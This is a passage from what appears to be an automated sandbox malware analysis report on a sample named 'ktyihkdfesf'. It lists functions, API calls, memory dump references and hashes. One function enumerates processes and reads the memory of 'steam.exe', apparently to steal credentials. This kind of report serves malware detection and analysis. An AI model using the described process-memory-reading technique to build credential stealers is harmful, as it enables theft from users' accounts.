                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??3@ProcessProcess32$CreateFirstMemoryNextOpenReadSnapshotToolhelp32_invalid_parameter_noinfo_noreturnmemsetstrcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID: steam.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 3498801153-2826358650
                                                                                                                                                                                                                                                                                                  • Opcode ID: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                                  • Instruction ID: c95efb34c5d0572b28db4c51e5027ad35194888a113b08cfb57a14cf0263e5e6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4F0F9B1A003082BEA10753A7CC5AFB7948DA55758F040537FD5597342F59B8CD402BA
                                                                                                                                                                                                                                                                                                  Function 0041D710 Relevance: 6.1, APIs: 4, Instructions: 82timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041D784
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D78E
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D7A9
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D80E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 931dc2256524a03f6c6b52008fe1b6fe3cfd9aca74429015198684bf78445e10
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0318BB2904B109AE329CF29C8547B7BBE4FF84340F008A2EF5D69A250E779E485DB55
                                                                                                                                                                                                                                                                                                  Function 004113B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69stringtimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 004113C9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: SystemTimelstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                                                                                                                                                                                                                                                                                  • API String ID: 3844799746-2529986050
                                                                                                                                                                                                                                                                                                  • Opcode ID: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0ad9b0325b1aa92503a801a233b5e7783d800f0c675173fcafeea2b792c599d4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F110330304200ABC704AB76A81667FB7A7EBC5304F45507EF442C73A1DE389C8087A5